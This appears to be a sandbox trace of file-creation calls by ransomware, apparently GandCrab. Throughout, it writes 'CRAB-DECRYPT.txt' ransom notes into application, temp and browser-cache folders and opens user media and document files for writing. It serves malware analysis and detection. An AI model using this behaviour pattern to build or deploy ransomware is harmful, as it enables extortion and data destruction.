Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsFeedback_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsPhone_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.ContactSupport_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.devicesflow_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.MiracastView_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PrintDialog_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetCookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetHistory\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Licenses\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\8IT9H3B2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\S0DXV6ZB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\Z8MX2JKH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.MSO\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\counters.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\8IT9H3B2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\8IT9H3B2\instrument17[1].htm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\S0DXV6ZB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\Z8MX2JKH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\Content.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\IE\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\SmartScreenCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\SuggestedSites.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\C\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\C\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
